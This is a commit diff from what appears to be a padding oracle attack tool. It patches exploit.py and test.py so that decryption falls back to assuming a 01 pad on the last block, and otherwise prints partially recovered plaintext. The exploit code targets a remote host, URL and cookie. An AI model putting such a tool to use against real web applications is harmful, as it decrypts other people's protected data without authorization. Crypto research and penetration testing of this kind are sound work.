FIX decryption fail with padding 01 #1

> python test.py -m testTESTtestTESTtestTESTtestTES -v won't work,
because the byte 1 is bypassed by ct_pos != i+1 (which in test.py is
ct_pos != 1 different from exploit.py)

Correction : if no padding is found on last byte of the last block, we
try with padding 01 and check then the second, third... byte !

Author: mpgn

exploit.py

@@ -142,13 +142,26 @@ def run(cipher,size_block,host,url,cookie,method,post,error):
 
                         break 
             if found == False:
-                print "\n[-] Error decryption failed"
-                result.insert(0, ''.join(valide_value))
-                hex_r = ''.join(result)
-                print "[+] Partial Decrypted value (HEX):", hex_r.upper()
-                padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
-                print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
-                sys.exit()
+                # lets say padding is 01 for the last block (the padding block)
+                if len(cipher_block)-1 == block:
+                    value = re.findall('..',bk)
+                    valide_value.insert(0,"01")
+                    if args.verbose == True:
+                        print ''
+                        print '[-] No padding found, but maybe the padding is length 01 :)'
+                        print "[+] Block M_Byte : %s"% bk
+                        print "[+] Block C_{i-1}: %s"% bp
+                        print "[+] Block Padding: %s"% bc
+                        print ''
+                        bytes_found = ''.join(valide_value)
+                else:
+                    print "\n[-] Error decryption failed"
+                    result.insert(0, ''.join(valide_value))
+                    hex_r = ''.join(result)
+                    print "[+] Partial Decrypted value (HEX):", hex_r.upper()
+                    padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
+                    print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+                    sys.exit()
             found = False
 
         result.insert(0, ''.join(valide_value))

test.py

@@ -154,14 +154,27 @@ def run(cipher,size_block):
 
                         break
             if found == False:
-                print "\n[-] Error decryption failed"
-                result.insert(0, ''.join(valide_value))
-                hex_r = ''.join(result)
-                if len(hex_r) > 0:
-                    print "[+] Partial Decrypted value (HEX):", hex_r.upper()
-                    padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
-                    print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
-                sys.exit()
+                # lets say padding is 01 for the last block (the padding block)
+                if len(cipher_block)-1 == block:
+                    value = re.findall('..',bk)
+                    valide_value.insert(0,"01")
+                    if args.verbose == True:
+                        print ''
+                        print '[-] No padding found, but maybe the padding is length 01 :)'
+                        print "[+] Block M_Byte : %s"% bk
+                        print "[+] Block C_{i-1}: %s"% bp
+                        print "[+] Block Padding: %s"% bc
+                        print ''
+                        bytes_found = ''.join(valide_value)
+                else:
+                    print "\n[-] Error decryption failed"
+                    result.insert(0, ''.join(valide_value))
+                    hex_r = ''.join(result)
+                    if len(hex_r) > 0:
+                        print "[+] Partial Decrypted value (HEX):", hex_r.upper()
+                        padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
+                        print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+                    sys.exit()
             found = False
 
         result.insert(0, ''.join(valide_value))